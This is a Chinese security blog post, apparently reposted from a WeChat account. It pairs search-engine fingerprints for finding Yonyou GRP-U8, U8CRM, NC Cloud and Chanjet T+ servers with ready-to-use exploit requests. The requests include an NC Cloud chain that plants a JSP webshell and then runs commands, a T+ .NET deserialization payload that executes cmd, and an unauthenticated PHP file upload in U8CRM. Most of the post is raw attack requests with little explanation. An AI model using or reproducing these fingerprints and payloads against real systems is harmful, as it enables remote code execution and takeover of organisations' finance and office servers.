用友grp:
app="用友-GRP-U8"
用友GRP-U8 行政事业财务管理软件
用友GRP-U8 高校内控管理软件
body="U8Accid" || title="GRP-U8" || body="用友优普信息技术有限公司"
用友8+crm
app="用友U8CRM"
body="用友U8CRM"
用友畅捷通t+
app="畅捷通-TPlus"
title="畅捷通 T+"
用友NC-Cloud:
app="用友-NC-Cloud" && server=="Apache-Coyote/1.1"
app="用友-UFIDA-NC"
icon_hash="1085941792"
"NCCloud"
用友-移动系统管理:
app="用友-移动系统管理"
body="../js/jslib/jquery.blockUI.js"
fid="xZFxZ+0a5nbM8BHjAD9aCg=="
用友时空:
app="用友-时空KSOA"
用友U8-OA:
"用友U8-OA"
FE协作:
"FE协作"
用友GRP敏感信息泄露:
攻击者通过漏洞可以获取服务器敏感信息
登录界面:
验证poc
/logs/info.log
用友 NC Cloud 远程命令执行漏洞
漏洞影响
NC63、NC633、NC65
NC Cloud1903、NC Cloud1909
NC Cloud2005、NC Cloud2105、NC Cloud2111
YonBIP高级版2207
登录页面:
poc如下:
先上传404的小马马 返回时404/200均可
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1Host: 127.0.0.1:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: cookiets=168170496; JSESSIONID=33A343770FF.serverIf-None-Match: W/"1571-1589211696000"If-Modified-Since: Mon, 11 May 2020 15:41:36 GMTConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 249{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
接下来就是rce时刻了
POST /404.jsp?error=bsh.Interpreter HTTP/1.1Host: 127.0.0.1:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: cookiets=1681785232226; JSESSIONID=334D3ED07A343770FF.serverIf-None-Match: W/"1571-1589211696000"If-Modified-Since: Mon, 11 May 2020 15:41:36 GMTConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 104cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ping 8.8.8.8").getInputStream())
发射成功
畅捷通T+远程命令执行漏洞
登录界面:
POST /tplus/ajaxpro/Ufida.T.CodeBehind.PriorityLevel,AppCode.ashx?method=GetstoreWarehouseByStore HTTP/1.1Host:User-Agent: Mozilla/5.0 (X11;Linuxx86 64)AppleWebKit/537.36(KHTML, likeGecko)Chrome/34.0.1847.137 Safari 4E423FConnection: closeContent-Length:668 X-Ajaxpro-Method:GetstoreWarehouseByStoreAccept-Encoding:gzip { "storeID":{"type":"system.Windows.Data.objectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35", "MethodName":"start","objectInstance":{" type":"system.Diagnostics.Process, System,Version=4.0.0.0,Culture=neutral, PublicKeyToken=b77a5c561934e089" "startInfo":{" type":"system.Diagnostics.ProcessstartInfo, system,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089","FileName":"cmd", "Arguments":"/cwhoami>C:/Progra~2/Chanjet/TPlusStd/Website/2RUsL6jgx9sGX4GItBcVfxarBM.txt" } } } }
查看dnslog回显
用友CRM 文件上传
登陆页面:
POC如下:
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1Host:User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36Connection: closeContent-Length: 205Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQAccept-Encoding: gzip, deflate------WebKitFormBoundarykS5RKgl8t3nwInMQContent-Disposition: form-data; name="file"; filename="ceshi.php "Content-Type: text/plainecho md5(1234);------WebKitFormBoundarykS5RKgl8t3nwInMQ
返回包回显路径:
"filePath":"D:\U8SOFT\turbocrm70\code\www\tmpfile\mht1C33.tmp.mht"
/tmpfile/upd1C32.tmp.php后台回复:“快乐星球” 关注最新动态
微信群已经创建,感兴趣的师傅后台回复:进群
原文始发于微信公众号(左逆安全攻防):用友OA指纹识别+合集
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论